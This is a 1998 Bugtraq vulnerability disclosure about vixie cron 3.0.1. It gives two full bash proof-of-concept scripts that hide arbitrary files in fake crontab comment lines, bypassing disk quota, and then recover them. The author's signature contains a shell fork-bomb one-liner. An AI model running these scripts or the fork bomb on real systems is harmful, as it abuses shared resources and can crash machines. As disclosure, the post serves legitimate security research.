X-RDate: Mon, 09 Feb 1998 11:23:09 +0500 (ESK)
Date: Thu, 5 Feb 1998 17:16:18 +0100
From: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: [linux-security] vixie cron 3.0.1 continued
The problem with vixie cron is wider (and more funny) than I expected.
Here's my proggy which allows hiding files of any kind and size into
crontab entries (remember, quota is ignored ;-):
-- cron_put --
#!/bin/bash
echo "Vixie cron 3.0.1 file storage - put utlility"
echo "by Michal Zalewski <lcamtuf@staszic.waw.pl>"
echo
if [ "$1" = "" ]; then
echo usage: $0 file_to_hide
echo
exit 0
fi
if [ ! "`ulimit`" = "unlimited" ]; then
echo Warning, filesize limit is set to `ulimit`.
echo
fi
echo Installing fake crontab...
echo
echo "* * * * * # whoops..." >vix_tmp
uuencode $1 <$1 | awk -F "\n" '{print "#FAKE" $1}' >>vix_tmp
crontab vix_tmp
echo "Thank you, file stored successfully."
-- eof --
The next program allows futher extraction of these files:
-- cron_get --
#!/bin/bash
echo "Vixie cron 3.0.1 file storage - get utility"
echo "by Michal Zalewski <lcamtuf@staszic.waw.pl>"
echo
if [ ! "`ulimit`" = "unlimited" ]; then
echo Warning, filesize limit is set to `ulimit`.
echo
fi
crontab -l | grep "#FAKE" | awk -F "#FAKE" '{print $2}'|uudecode
echo "File restored successfully."
-- eof --
_______________________________________________________________________
Micha³ Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterowaæ jest rzecz± ludzk±, wykonywaæ rekursywnie - bosk± [P. Deustch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
--
----------------------------------------------------------------------
Please refer to the information about this list as well as general
information about Linux security at http://www.aoy.com/Linux/Security.
----------------------------------------------------------------------
To unsubscribe: mail -s unsubscribe test-list-request@redhat.com < /dev/null
